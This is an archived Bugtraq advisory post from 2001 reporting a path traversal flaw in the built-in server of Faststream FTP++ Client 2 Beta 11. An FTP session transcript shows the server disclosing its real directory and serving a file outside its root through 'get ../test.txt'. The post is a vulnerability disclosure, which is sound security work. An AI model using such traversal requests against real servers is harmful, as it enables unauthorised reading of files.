Bugtraq mailing list archives
Faststream FTP++ Client 2 Beta 11 (build in server) Vulnerability
From: se00020 () LION CC
Date: Sun, 4 Mar 2001 16:26:23 -0000
Faststram FTP built in server responds with the real path of directory instead of a virtual one.It is possible to get files outside of root.dir. e:\crap was used as root directory 1. directory path 230 User anonymous logged in. ftp> pwd 257 "/E:/crap/" is current directory. 2. getting files from outside of root ftp> dir 200 Port command successful. 150 Opening data connection for directory list. drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 . drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .. drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test -rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt -rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29 bisontest.txt drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu 226 File sent ok FTP: 438 Bytes empfangen in 0,00Sekunden 438000,00KB/s ftp> get ../test.txt 200 Port command successful. 150 Opening data connection for ../test.txt. 226 File sent ok FTP: 15 Bytes empfangen in 0,01Sekunden 1,50KB/s Solution: no quick fix possible.Use with care. Author has been contacted on 04.Mar.2001 se00020 () fhs-hagenberg ac at se00020 () lion cc
Current thread:
- Faststream FTP++ Client 2 Beta 11 (build in server) Vulnerability se00020 (Mar 04)
- Re: Faststream FTP++ Client 2 Beta 11 (build in server) Vulnerability SNS Research (Mar 05)